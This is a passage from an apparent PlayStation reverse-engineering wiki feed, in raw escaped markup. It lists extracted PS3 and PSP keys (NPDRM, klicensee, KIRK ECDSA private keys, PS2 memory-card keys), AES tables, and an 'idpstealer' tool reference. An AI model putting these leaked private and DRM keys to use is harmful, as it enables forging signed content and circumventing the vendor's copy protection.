style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;BF036387CDB613C0AC88A6D9D2CC5316&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;A14F6D5F9AD7EBB3B7A39A7C32F13E5DC3B0BA16BDC33D39FDDF88F4AEEA6CFEEB0C0796C917A952&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;0x0F&lt;/code&gt;&lt;/span&gt;<br /> |-<br /> |}<br /> <br /> === AppLdr hmac key ===<br /> &lt;code&gt;A09B58A612B9F4C13451A1B81C94ABF8423ED76A96271A722394F0DD042BA2CAA41A567177A8B500235C74495842BF2007FAF274CC81091AD57AF7264A60E2CE&lt;/code&gt;<br /> <br /> Note: Used for LV2 memory check.<br /> <br /> This key was implemented since 3.55.<br /> <br /> === klicensee ===<br /> <br /> ==== klic_dec_key ==== <br /> klic_dec_key : F2FBCA7A75B04EDC1390638CCDFDD1EE<br /> See: http://pastie.org/private/k2vlnqi6h8onbkxhpjuxg<br /> <br /> klic_dec_old_key : DC41D59080BFFF45547D0B3A12E591D3<br /> <br /> ==== klic_dev_key ====<br /> Found inside ps1_netemu.self &lt;br /&gt;<br /> Used as klicensee for ISO.BIN.EDAT<br /> klic_dev_key : 52C0B5CA76D6134BB45FC66CA637F2C1<br /> <br /> ==== klic_free_key ====<br /> see NPDRM OMAC Keys<br /> klic_free_key : 72F990788F9CFF745725F08E4C128387<br /> <br /> ==== RIF's act.dat index decryption key ====<br /> actdatix_dec_key : DA7D4B5E499A4F53B1C1A14A7484443B<br /> Actually in vsh.self<br /> <br /> ==== riv_key ====<br /> riv_key : 00000000000000000000000000000000<br /> (former posted value was the sha1 of 0, not a proper key. iv is all zeroes - see also [https://www.das-labor.org/trac/browser/microcontroller-2/crypto-lib/testvectors/Sha-1-160.test-vectors :/])<br /> Actually in appldr<br /> <br /> ==== klicensee constant ====<br /> klicensee_const : 5E06E04FD94A71BF0000000000000001<br /> Actually in lv2_kernel.self<br /> <br /> ==== klicensee(psp) ====<br /> Found inside psp_emulator.self &lt;br /&gt;<br /> Used as klicensee for ISO.BIN.EDAT<br /> <br /> klicensee for psp minis:<br /> <br /> klic_psp: 2A6AFBCF43D1579F7D738741A13BD42E<br /> <br /> klicensee for psp remasters:<br /> <br /> klic_pe : 0DB85732366CD734FC879E743343BB4F<br /> <br /> ==== vsh pub + curvetable ====<br /> pub : 6227B00A02856FB04108876719E0A0183291EEB96E736ABF81F70EE9161B0DDEB026761AFF7BC85B<br /> curves : 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000<br /> 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000<br /> 0000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFE000000<br /> 00000000000000000000000000FFFFFFFE00000000000000039A2EB773FCA61DCB5236A42C6F7FEB426E5ADA06<br /> 0000000000000000FFFE4A39E80D6F151E245270DDA65311EAB7634F69577D0F51E30602711A07059FBCA7BA92<br /> F5E34D6F7216F0D828A37D413EF73F0000000000000000FFFFFFFE00000000000000000000000000000000FFFF<br /> FFFE00000000000000035974123CCBE7FD63E2C31CC465CDE0334461F0F4000000000000000100004A51C3ADC1<br /> 9C6BB0DED8ED713BDA9B780270209B1DBC843F5E092A5021D3A6A7AA814E24FFED9FBDAADB243C862A53A0B520<br /> inv_curves: FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF<br /> FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF<br /> FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF00000001FFFFFF<br /> FFFFFFFFFFFFFFFFFFFFFFFFFF00000001FFFFFFFFFFFFFFFC65D1488C0359E234ADC95BD3908014BD91A525F9<br /> FFFFFFFFFFFFFFFF0001B5C617F290EAE1DBAD8F2259ACEE15489CB096A882F0AE1CF9FD8EE5F8FA604358456D<br /> 0A1CB2908DE90F27D75C82BEC108C0FFFFFFFFFFFFFFFF00000001FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF0000<br /> 0001FFFFFFFFFFFFFFFCA68BEDC33418029C1D3CE33B9A321FCCBB9E0F0BFFFFFFFFFFFFFFFEFFFFB5AE3C523E<br /> 63944F2127128EC4256487FD8FDF64E2437BC0A1F6D5AFDE2C5958557EB1DB001260425524DBC379D5AC5F4ADF<br /> <br /> Notes:&lt;br /&gt;<br /> *It is used for rif/act.dat signatures, for example.&lt;br /&gt;<br /> <br /> [http://www.multiupload.com/A19Q0HV7OW vsh-pub-curves.rar (367 Bytes)]<br /> <br /> == Snowden Key (in vsh.elf or vshnet.prx into old firmwares) ==<br /> 9DE004E9F2D72F6DE377699BC2E5F83A4C28EEA575DBEAA293F3835E8B7AFA9A <br /> 16573AD5B0DEEBCCE1A7C54C66B903AE4186FBD7EEB23F16E67A19420B262114 <br /> 08B91715ACC3D1998A37A4639FAFF064E9F90C0FECB28C813FA9F649074C9A33 <br /> 0392EA2B91C3FD3732D1DFED7CA151A21926F0B315107BF1FBEA8929E68AB397<br /> <br /> == VSH CryptoEngine Sha1Hmac keys ==<br /> key0 685E2534695D79096F57640044315B515E0C7E55<br /> key1 46753933634D1A1D464142752110116F2C5E7836<br /> key2 59CB6067574D873CEFD7B75A300529C18BFB75ED<br /> key3 C699CF88072F6819D5DAFA7A2EEB93E537E0ADE2<br /> key4 E8ABDAE8F81C086123FE5D6281BB0F0DEE909AF5<br /> key5 F8A05D44A04E5C036812261DB70EE1708EBC4D48<br /> key6 A3F58C9913A108BE8C1EDB889C2BF8F7578101DA<br /> key7 B6627AE4422F9D81E1421FA2B1DB02841E64B933<br /> <br /> == NPDRM stuff ==<br /> &lt;!--// needs some logical reordering in module subsection //--&gt;<br /> http://img24.imageshack.us/img24/9083/snapshote.png<br /> <br /> ==== GPKG/SELF ECDSA signature ====<br /> Public key: &lt;code&gt;E6792E446CEBA27BCADF374B99504FD8E80ADFEB3E66DE73FFE58D3291221C65018C038D3822C3C9&lt;/code&gt;&lt;br /&gt;<br /> Public bak: &lt;code&gt;D9AAEB6054307FC0FB488B15AE11B558C75FC8A3EC4907E129C5B5CD386D94D82318B9D558777C5A&lt;/code&gt;&lt;br /&gt;<br /> Curve type: 2 (vsh)&lt;br /&gt;<br /> <br /> ==== NPDRM OMAC Keys ====<br /> npdrm-omac-key-1: 72F990788F9CFF745725F08E4C128387<br /> npdrm-omac-key-2: 6BA52976EFDA16EF3C339FB2971E256B<br /> npdrm-omac-key-3: 9B515FEACF75064981AA604D91A54E97<br /> <br /> == PSISOIMG0000 ==<br /> See also : [[PSISOIMG0000]]&lt;br /&gt;<br /> <br /> Public key: <br /> &lt;code&gt;948DA13E8CAFD5BA0E90CE434461BB327FE7E080475EAA0AD3AD4F5B6247A7FDA86DF69790196773&lt;/code&gt;&lt;br /&gt;<br /> Private key: <br /> &lt;code&gt;00bf21224b041f29549db25e9aade19e720a1fe0f1&lt;/code&gt;&lt;br /&gt;<br /> Curve type: 2 (vsh-curves, but can be found in ps1_netemu, too)&lt;br /&gt;<br /> This key is also used for signing content of the ISO.BIN.EDAT (decrypted form). The signature is located at the tail of the decrypted ISO.BIN.EDAT, its length is 0x28 bytes.<br /> <br /> location: inside ps1_newemu.self (example from 3.55, but same as 2.10 and higher):<br /> Offset(h) 00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F<br /> 00126AB0 94 8D A1 3E 8C AF D5 BA 0E 90 CE 43 44 61 BB 32 ”.¡&gt;Œ¯Õº..ÎCDa»2<br /> 00126AC0 7F E7 E0 80 47 5E AA 0A D3 AD 4F 5B 62 47 A7 FD .çà€G^ª.Ó­O[bG§ý<br /> 00126AD0 A8 6D F6 97 90 19 67 73 ¨mö—..gs<br /> and ps1_netemu.self (example from 3.55, but same as 1.70 and higher):<br /> Offset(h) 00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F<br /> 0016FA10 94 8D A1 3E 8C AF D5 BA 0E 90 CE 43 44 61 BB 32 ”.¡&gt;Œ¯Õº..ÎCDa»2<br /> 0016FA20 7F E7 E0 80 47 5E AA 0A D3 AD 4F 5B 62 47 A7 FD .çà€G^ª.Ó­O[bG§ý<br /> 0016FA30 A8 6D F6 97 90 19 67 73 ¨mö—..gs<br /> <br /> == DOCUMENT.DAT ==<br /> des key: 39F7EFA16CCE5F4C<br /> <br /> des iv: A819C4F5E154E30B<br /> Location: ps1_netemu.self<br /> <br /> == PS2 Keys ==<br /> MC_CARDKEY_MATERIAL_1 6C26D37F46EE9DA9 &lt;-mc_iso<br /> MC_CARDKEY_HASHKEY_1 CE62F68420B65A81E459FA9A2BB3598A &lt;-mc_iso<br /> MC_CARDKEY_MATERIAL_2 2CD160FA8C2ED362 &lt;-mc_iso<br /> MC_CARDKEY_HASHKEY_2 7014A32FCC5B1237AC1FBF4ED26D1CC1 &lt;-mc_iso<br /> MC_CHALLENGE_MATERIAL 2C5BF48D32749127 &lt;-mc_iso<br /> MG_KBIT_MATERIAL 35C860019222BB60 &lt;-me_iso<br /> MG_KC_MATERIAL 8C2BD03EC245C56D &lt;-me_iso<br /> MG_KBIT_MASTER_KEY 5001C87121F939C144D86B069224B247 &lt;- me_iso<br /> MG_KC_MASTER_KEY 77F38314B047D87C9B37D266049228C4 &lt;- me_iso<br /> META_KEY_RETAIL 389DCBA5203C8159ECF94C9393164CC9 &lt;- sb_iso<br /> DATA_KEY_RETAIL 1017823463F468C1AA41D700B140F257 &lt;- sb_iso<br /> VMC_KEY_RETAIL 64E30D19A16941D677E32EEBE07F45D2 &lt;- sb_iso<br /> META_KEY_DEBUG 2B05F7C7AFD1B169D62586503AEA9798 &lt;- sb_iso <br /> DATA_KEY_DEBUG 74FF7E5D1D7B96943BEFDCFA81FC2007 &lt;- sb_iso <br /> VMC_KEY_DEBUG 30479D4B80E89E2B59E5C9145E1064A9 &lt;- sb_iso<br /> <br /> == LV2 Kernel 3Des Key ==<br /> <br /> 57C3E792E8D03DC4D2D72DFA4F81FB2889170959<br /> <br /> * used in conjuction with ivs_3des<br /> <br /> == KIRK ==<br /> <br /> * Note: KIRK CMD11 isn't vulnerable to retrieval of private key. KIRK1 is.<br /> <br /> '''see also:'''<br /> * https://github.com/uofw/upspd/wiki/KIRK-13---ECDSA-point-multiplication<br /> * https://code.google.com/p/kirk-engine/source/browse/trunk/libkirk/kirk_engine.c<br /> * http://wololo.net/talk/viewtopic.php?f=6&amp;t=7224<br /> * http://jpcsp.googlecode.com/svn-history/r2166/trunk/src/jpcsp/crypto/CryptoEngine.java [https://github.com/codestation/mhtools/blob/master/src/jpcsp/crypto/CryptoEngine.java] / https://code.google.com/p/jpcsp/source/browse/trunk/src/jpcsp/crypto/KeyVault.java [https://github.com/codestation/mhtools/tree/master/src/keys]<br /> <br /> === Private-Public Crypto ===<br /> <br /> // KIRK CMD1 ECDSA Private Key<br /> kirk1_priv = F392E26490B80FD889F2D9722C1F34D7274F983D<br /> <br /> // PSP EDAT ECDSA Private Key<br /> edat_priv = E5C4D0A8249A6F27E5E0C9D534F4DA15223F42AD<br /> <br /> // NPUMDIMG ECDSA Private Key<br /> priv_key_npumdimg = 14B022E892CF8614A44557DB095C928DE9B89970<br /> <br /> // KIRK1 ECDSA Public Key<br /> kirk1_pub_x = ED9CE58234E61A53C685D64D51D0236BC3B5D4B9 <br /> kirk1_pub_y = 049DF1A075C0E04FB344858B61B79B69A63D2C39<br /> <br /> // PSP EDAT ECDSA Public Key<br /> edat_pub_x = 1F072BCCC162F2CFAEA0E7F4CDFD9CAEC6C45521<br /> edat_pub_y = 5301F4E370C3EDE2D4F5DBC3A7DE8CAAE8AD5B7D<br /> <br /> // NPUMDIMG ECDSA Public Key<br /> npdu_pub_x = 0121EA6ECDB23A3E2375671C5362E8E28B1E783B<br /> npdu_pub_y = 1A2732158B8CED98466C18A3AC3B1106AFB4EC3B<br /> <br /> /* ECC Curves for Kirk 1 and Kirk 11 */<br /> // Common Curve paramters p and a<br /> ec_p = FFFFFFFFFFFFFFFF00000001FFFFFFFFFFFFFFFF<br /> ec_a = FFFFFFFFFFFFFFFF00000001FFFFFFFFFFFFFFFC // mon<br /> <br /> // Kirk C,D,10,11,(likely 12)- Unique curve parameters for b, N, and base point G for Kirk C,D,10,11,(likely 12) service<br /> // Since public key is variable, it is not specified here<br /> ec_b2 = A68BEDC33418029C1D3CE33B9A321FCCBB9E0F0B// mon<br /> ec_N2 = 00FFFFFFFFFFFFFFFEFFFFB5AE3C523E63944F2127<br /> Gx2 = 128EC4256487FD8FDF64E2437BC0A1F6D5AFDE2C <br /> Gy2 = 5958557EB1DB001260425524DBC379D5AC5F4ADF <br /> <br /> // KIRK 1 - Unique curve parameters for b, N, and base point G<br /> // Since public key is hard coded, it is also included<br /> <br /> ec_b1 = 65D1488C0359E234ADC95BD3908014BD91A525F9<br /> ec_N1 = 00FFFFFFFFFFFFFFFF0001B5C617F290EAE1DBAD8F<br /> Gx1 = 2259ACEE15489CB096A882F0AE1CF9FD8EE5F8FA <br /> Gy1 = 604358456D0A1CB2908DE90F27D75C82BEC108C0<br /> <br /> === Private Crypto ===<br /> <br /> // KIRK CMD1 AESCBC128-CMAC key<br /> kirk1_key = 98C940975C1D10E87FE60EA3FD03A8BA<br /> <br /> // KIRK CMD4 and CMD7 AESCBC128 key table<br /> kirk7_key02 = B813C35EC64441E3DC3C16F5B45E6484 // New from PS3<br /> kirk7_key03 = 9802C4E6EC9E9E2FFC634CE42FBB4668<br /> kirk7_key04 = 99244CD258F51BCBB0619CA73830075F<br /> kirk7_key05 = 0225D7BA63ECB94A9D237601B3F6AC17<br /> kirk7_key07 = 76368B438F77D87EFE5FB6115939885C // New from PS3<br /> kirk7_key0C = 8485C848750843BC9B9AECA79C7F6018<br /> kirk7_key0D = B5B16EDE23A97B0EA17CDBA2DCDEC46E<br /> kirk7_key0E = C871FDB3BCC5D2F2E2D7729DDF826882<br /> kirk7_key0F = 0ABB336C96D4CDD8CB5F4BE0BADB9E03<br /> kirk7_key10 = 32295BD5EAF7A34216C88E48FF50D371<br /> kirk7_key11 = 46F25E8E4D2AA540730BC46E47EE6F0A<br /> kirk7_key12 = 5DC71139D01938BC027FDDDCB0837D9D<br /> kirk7_key38 = 12468D7E1C42209BBA5426835EB03303<br /> kirk7_key39 = C43BB6D653EE67493EA95FBC0CED6F8A<br /> kirk7_key3A = 2CC3CF8C2878A5A663E2AF2D715E86BA<br /> kirk7_key44 = 7DF49265E3FAD678D6FE78ADBB3DFB63 // New from PS3<br /> kirk7_key4B = 0CFD679AF9B4724FD78DD6E99642288B //1.xx game eboot.bin<br /> kirk7_key53 = AFFE8EB13DD17ED80A61241C959256B6<br /> kirk7_key57 = 1C9BC490E3066481FA59FDB600BB2870<br /> kirk7_key5D = 115A5D20D53A8DD39CC5AF410F0F186F<br /> kirk7_key63 = 9C9B1372F8C640CF1C62F5D592DDB582<br /> kirk7_key64 = 03B302E85FF381B13B8DAA2A90FF5E61 <br /> <br /> //KIRK Unknown 100 key<br /> kirk_unk100 = 000102030405060708090A0B0C0D0E0F<br /> <br /> // KIRK CMD0x10 key<br /> kirk10_key = 475E09F4A237DA9BEFFF3BC077143D8A<br /> <br /> // CHNNLSV SaveData keys<br /> sdHashKey1 = 40E6533F05113A4EA14BDAD6727C534C<br /> sdHashKey2 = FAAA50EC2FDE5493AD14B2CEA53005DF<br /> sdHashKey3 = 36A53EACC5269EA383D9EC256C484872<br /> sdHashKey4 = D8C0B0F33E6B7685FDFB4D7D451E9203<br /> sdHashKey5 = CB15F407F96A523C04B9B2EE5C53FA86<br /> sdHashKey6 = 7044A3AEEF5DA5F2857FF2D694F5363B<br /> sdHashKey7 = EC6D29592635A57F972A0DBCA3263300<br /> <br /> // AMCTRL keys<br /> amHashKey1 = 9C48B62840E6533F05113A4E65E63A64<br /> amHashKey2 = 70B47BC0A14BDAD6E01014ED727C534C<br /> amHashKey3 = E350ED1D910A1FD029BB1C3EF34077FB<br /> amHashKey4 = 135FA47CAB395BA476B8CCA98F3A0445<br /> amHashKey5 = 678D7FA32A9CA0D1508AD8385E4B017E<br /> <br /> == PEmuCoreLib Key (3DES) ==<br /> EF690EC0E0BFA41F08455BD038EB8762DA3923EF9C61B930 erk<br /> 2DEE8950969112D9 riv<br /> <br /> ==Idpstealer Key?==<br /> <br /> DES encrypt 192? bit<br /> 5E5B43EF9BC2CD75B0F2AEF7FD3B199762D6C13280E50D3E 0000000000000000<br /> <br /> * Location: explore_plugin.sprx<br /> <br /> === Idpstealer Key Confusion ===<br /> <br /> * here's the executable (with printf) :<br /> https://mega.nz/#!FwsWwCoJ!eReYmfKNvEXMNdG7YLBrNJui1sxeN1FIRzpqEFQTikM<br /> * here's the source (with printf) : http://pastie.org/private/slfjwzyshcrsq7mnycxc0w<br /> * here's the specific function : http://pastie.org/10530594<br /> * usage: &lt;code&gt; idpstealer.exe idps.bin &lt;/code&gt;<br /> * output: &lt;code&gt; SID_KEY: 5E5B43EF9BC2CD75B0F2AEF7FD3B199762D6C13280E50D3E &lt;/code&gt;<br /> <br /> ==TMDB Key==<br /> <br /> sha1-hmac key<br /> F5DE66D2680E255B2DF79E74F890EBF349262F618BCAE2A9ACCDEE5156CE8DF2CDF2D48C71173CDC2594465B87405D197CF1AED3B7E9671EEB56CA6753C2E6B0<br /> <br /> * Location: explore_plugin.sprx<br /> Used to generate URLs to obtain Title infos.<br /> For example, title_id: BLES01133<br /> seed will contain BLES01133_00<br /> openssl dgst -mac hmac -macopt hexkey:F5DE66D2680E255B2DF79E74F890EBF349262F618BCAE2A9ACCDEE5156CE8DF2CDF2D48C71173CDC2594465B87405D197<br /> CF1AED3B7E9671EEB56CA6753C2E6B0 -sha1 seed<br /> HMAC-SHA1(seed.bin)= 93ec11e04b137b433a9c867603e64660782a762e<br /> <br /> URL will be: http://tmdb.np.dl.playstation.net/tmdb/BLES01133_00_93EC11E04B137B433A9C867603E64660782A762E/BLES01133_00.xml<br /> <br /> ==Sbox Values==<br /> <br /> {| class=&quot;wikitable&quot;<br /> ! D/L !! hex !! Note <br /> |-<br /> | [http://www.multiupload.com/B5F336G4UF] <br /> | S-box (You can read more about this here http://en.wikipedia.org/wiki/Rijndael_S-box)<br /> Offset(h) 00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F<br /> <br /> 00018F80 63 7C 77 7B F2 6B 6F C5 30 01 67 2B FE D7 AB 76 c|w{òkoÅ0.g+þ׫v<br /> 00018F90 CA 82 C9 7D FA 59 47 F0 AD D4 A2 AF 9C A4 72 C0 Ê‚É}úYGð­Ô¢¯œ¤rÀ<br /> 00018FA0 B7 FD 93 26 36 3F F7 CC 34 A5 E5 F1 71 D8 31 15 ·ý“&amp;6?÷Ì4¥åñqØ1.<br /> 00018FB0 04 C7 23 C3 18 96 05 9A 07 12 80 E2 EB 27 B2 75 .Ç#Ã.–.š..€âë'²u<br /> 00018FC0 09 83 2C 1A 1B 6E 5A A0 52 3B D6 B3 29 E3 2F 84 .ƒ,..nZ R;Ö³)ã/„<br /> 00018FD0 53 D1 00 ED 20 FC B1 5B 6A CB BE 39 4A 4C 58 CF SÑ.í ü±[j˾9JLXÏ<br /> 00018FE0 D0 EF AA FB 43 4D 33 85 45 F9 02 7F 50 3C 9F A8 ÐïªûCM3…Eù..P&lt;Ÿ¨<br /> 00018FF0 51 A3 40 8F 92 9D 38 F5 BC B6 DA 21 10 FF F3 D2 Q£@.’.8õ¼¶Ú!.ÿóÒ<br /> 00019000 CD 0C 13 EC 5F 97 44 17 C4 A7 7E 3D 64 5D 19 73 Í..ì_—D.ħ~=d].s<br /> 00019010 60 81 4F DC 22 2A 90 88 46 EE B8 14 DE 5E 0B DB `.OÜ&quot;*.ˆFî¸.Þ^.Û<br /> 00019020 E0 32 3A 0A 49 06 24 5C C2 D3 AC 62 91 95 E4 79 à2:.I.$\ÂÓ¬b‘•äy<br /> 00019030 E7 C8 37 6D 8D D5 4E A9 6C 56 F4 EA 65 7A AE 08 çÈ7m.ÕN©lVôêez®.<br /> 00019040 BA 78 25 2E 1C A6 B4 C6 E8 DD 74 1F 4B BD 8B 8A ºx%..¦´ÆèÝt.K½‹Š<br /> 00019050 70 3E B5 66 48 03 F6 0E 61 35 57 B9 86 C1 1D 9E p&gt;µfH.ö.a5W¹†Á.ž<br /> 00019060 E1 F8 98 11 69 D9 8E 94 9B 1E 87 E9 CE 55 28 DF áø˜.iÙŽ”›.‡éÎU(ß<br /> 00019070 8C A1 89 0D BF E6 42 68 41 99 2D 0F B0 54 BB 16 Œ¡‰.¿æBhA™-.°T».<br /> | Present in all SPU binaries that perform AES (see [http://www.psdevwiki.com/ps3/AES_binaries here])<br /> |-<br /> | <br /> | Inverse AES S-box<br /> Offset(h) 00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F<br /> <br /> 008633C0 52 09 6A D5 30 36 A5 38 BF 40 A3 9E 81 F3 D7 FB R.jХ06Ґ8ї@ЈћЃуЧы<br /> 008633D0 7C E3 39 82 9B 2F FF 87 34 8E 43 44 C4 DE E9 CB |г9‚›/я‡4ЋCDДЮйЛ<br /> 008633E0 54 7B 94 32 A6 C2 23 3D EE 4C 95 0B 42 FA C3 4E T{”2¦В#=оL•.BъГN<br /> 008633F0 08 2E A1 66 28 D9 24 B2 76 5B A2 49 6D 8B D1 25 ..Ўf(Щ$Іv[ўIm‹С%<br /> 00863400 72 F8 F6 64 86 68 98 16 D4 A4 5C CC 5D 65 B6 92 rшцd†h..Ф¤\М]e¶’<br /> 00863410 6C 70 48 50 FD ED B9 DA 5E 15 46 57 A7 8D 9D 84 lpHPэн№Ъ^.FW§Ќќ„<br /> 00863420 90 D8 AB 00 8C BC D3 0A F7 E4 58 05 B8 B3 45 06 ђШ«.ЊјУ.чдX.ёіE.<br /> 00863430 D0 2C 1E 8F CA 3F 0F 02 C1 AF BD 03 01 13 8A 6B Р,.ЏК?..БЇЅ...Љk<br /> 00863440 3A 91 11 41 4F 67 DC EA 97 F2 CF CE F0 B4 E6 73 :‘.AOgЬк—тПОрґжs<br /> 00863450 96 AC 74 22 E7 AD 35 85 E2 F9 37 E8 1C 75 DF 6E –¬t&quot;з.5…вщ7и.uЯn<br /> 00863460 47 F1 1A 71 1D 29 C5 89 6F B7 62 0E AA 18 BE 1B Gс.q.)Е‰o·b.Є.ѕ.<br /> 00863470 FC 56 3E 4B C6 D2 79 20 9A DB C0 FE 78 CD 5A F4 ьV&gt;KЖТy љЫАюxНZф<br /> 00863480 1F DD A8 33 88 07 C7 31 B1 12 10 59 27 80 EC 5F .ЭЁ3€.З1±..Y'Ђм_<br /> 00863490 60 51 7F A9 19 B5 4A 0D 2D E5 7A 9F 93 C9 9C EF `Q.©.µJ.-еzџ“Йњп<br /> 008634A0 A0 E0 3B 4D AE 2A F5 B0 C8 EB BB 3C 83 53 99 61  а;M®*х°Ил»&lt;ѓS™a<br /> 008634B0 17 2B 04 7E BA 77 D6 26 E1 69 14 63 55 21 0C 7D .+.~єwЦ&amp;бi.cU!.}<br /> |<br /> |-<br /> | <br /> | DES Sbox 1<br /> 01 01 04 00 00 00 00 00 00 01 00 00 01 01 04 04<br /> 01 01 00 04 00 01 04 04 00 00 00 04 00 01 00 00<br /> 00 00 04 00 01 01 04 00 01 01 04 04 00 00 04 00<br /> 01 00 04 04 01 01 00 04 01 00 00 00 00 00 00 04<br /> 00 00 04 04 01 00 04 00 01 00 04 00 00 01 04 00<br /> 00 01 04 00 01 01 00 00 01 01 00 00 01 00 04 04<br /> 00 01 00 04 01 00 00 04 01 00 00 04 00 01 00 04<br /> 00 00 00 00 00 00 04 04 00 01 04 04 01 00 00 00<br /> 00 01 00 00 01 01 04 04 00 00 00 04 01 01 00 00<br /> 01 01 04 00 01 00 00 00 01 00 00 00 00 00 04 00<br /> 01 01 00 04 00 01 00 00 00 01 04 00 01 00 00 04<br /> 00 00 04 00 00 00 00 04 01 00 04 04 00 01 04 04<br /> 01 01 04 04 00 01 00 04 01 01 00 00 01 00 04 04<br /> 01 00 00 04 00 00 04 04 00 01 04 04 01 01 04 00<br /> 00 00 04 04 01 00 04 00 01 00 04 00 00 00 00 00<br /> 00 01 00 04 00 01 04 00 00 00 00 00 01 01 00 04<br /> |<br /> |-<br /> |}<br /> <br /> in another form (from updater in ebootroms) : http://pastie.org/10070142 | http://pastie.org/10070145<br /> <br /> == RCON ==<br /> 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00<br /> 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00<br /> 04 00 00 00 04 00 00 00 04 00 00 00 04 00 00 00<br /> 08 00 00 00 08 00 00 00 08 00 00 00 08 00 00 00<br /> 10 00 00 00 10 00 00 00 10 00 00 00 10 00 00 00<br /> 20 00 00 00 20 00 00 00 20 00 00 00 20 00 00 00<br /> 40 00 00 00 40 00 00 00 40 00 00 00 40 00 00 00<br /> 80 00 00 00 80 00 00 00 80 00 00 00 80 00 00 00<br /> 1B 00 00 00 1B 00 00 00 1B 00 00 00 1B 00 00 00<br /> 36 00 00 00 36 00 00 00 36 00 00 00 36 00 00 00<br /> <br /> == Shuffles ==<br /> 00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F<br /> 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F 10<br /> 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F 10 11<br /> 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F 10 11 12<br /> 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F 10 11 12 13<br /> 05 06 07 08 09 0A 0B 0C 0D 0E 0F 10 11 12 13 14<br /> 06 07 08 09 0A 0B 0C 0D 0E 0F 10 11 12 13 14 15<br /> 07 08 09 0A 0B 0C 0D 0E 0F 10 11 12 13 14 15 16<br /> 08 09 0A 0B 0C 0D 0E 0F 10 11 12 13 14 15 16 17<br /> 09 0A 0B 0C 0D 0E 0F 10 11 12 13 14 15 16 17 18<br /> 0A 0B 0C 0D 0E 0F 10 11 12 13 14 15 16 17 18 19<br /> 0B 0C 0D 0E 0F 10 11 12 13 14 15 16 17 18 19 1A<br /> 0C 0D 0E 0F 10 11 12 13 14 15 16 17 18 19 1A 1B<br /> 0D 0E 0F 10 11 12 13 14 15 16 17 18 19 1A 1B 1C<br /> 0E 0F 10 11 12 13 14 15 16 17 18 19 1A 1B 1C 1D<br /> 0F 10 11 12 13 14 15 16 17 18 19 1A 1B 1C 1D 1E<br /> 10 11 12 13 14 15 16 17 18 19 1A 1B 1C 1D 1E 1F<br /> <br /> == ShiftRows tab ==<br /> 00 05 0A 0F 04 09 0E 03 08 0D 02 07 0C 01 06 0B<br /> 05 0A 0F 00 09 0E 03 04 0D 02 07 08 01 06 0B 0C<br /> 0A 0F 00 05 0E 03 04 09 02 07 08 0D 06 0B 0C 01<br /> 0F 00 05 0A 03 04 09 0E 07 08 0D 02 0B 0C 01 06<br /> <br /> == InvShiftRows tab ==<br /> 00 0D 0A 07 04 01 0E 0B 08 05 02 0F 0C 09 06 03<br /> 0D 0A 07 00 01 0E 0B 04 05 02 0F 08 09 06 03 0C<br /> 0A 07 00 0D 0E 0B 04 01 02 0F 08 05 06 03 0C 09<br /> 07 00 0D 0A 0B 04 01 0E 0F 08 05 02 03 0C 09 06<br /> <br /> == Td0/Te1 ==<br /> <br /> See [[https://invgen.googlecode.com/git-history/53549121c5b903c31cbae01b0cfeaa985035a4a5/Benchmarks/aes/aes_orig/aes_orig_hex2dec.py this]] and [[http://psdevwiki.com/ps3/AES_binaries binaries]] with sbox repeated 4 times<br /> <br /> == T5 ==<br /> Inside lv2_kernel<br /> see [[https://github.com/cforler/Ada-Crypto-Library/blob/master/src/crypto-symmetric-algorithm-aes-tables.ads this ]]<br /> <br /> {{Reverse engineering}}&lt;noinclude&gt;[[Category:Main]]&lt;/noinclude&gt;</div> Mathieulh http://www.psdevwiki.com/ps3/index.php?title=Syscon_Hardware&diff=44689 Syscon Hardware 2017-07-07T13:28:00Z <p>Mathieulh: assumed a typo when there isn't one</p> <hr /> <div>&lt;div style=&quot;float:right&quot;&gt;[[File:SYSCON_GEN1.JPG|thumb|Syscon 1st Generation (BGA Packaging)]]&lt;br /&gt;[[File:Pyramid Syscon live probing.jpg|thumb|Pyramid Syscon live probing]]&lt;/div&gt;<br /> <br /> Syscon is the main power controller chip. It is responsible for powering up the various power systems and for configuring and initialising the [[CELL BE]], [[RSX]] and [[South Bridge]]. It communicates with these devices via seperate SPI busses. There is external access by JTAG (disabled from factory on retail models), an EEPROM programming interface &lt;!-- not fully examined --&gt; and Serial (UART). The Syscon is a SoC and consists of an ARM7TDMI (ARMv4) CPU, a 256KB EEPROM and 16KB RAM.<br /> <br /> = Serialnumbers @ SKU =<br /> <br /> == Retail ==<br /> {| class=&quot;wikitable sortable&quot;<br /> |-<br /> ! [[SKU Models|Model]] !! [[IDPS|Type]] !! [[Motherboard Revisions|Board]] !! [[Syscon Hardware|Syscon&lt;br /&gt;part no.]] !! Syscon&lt;br /&gt;[[More System Information#First_section|Soft ID]] !! Notes<br 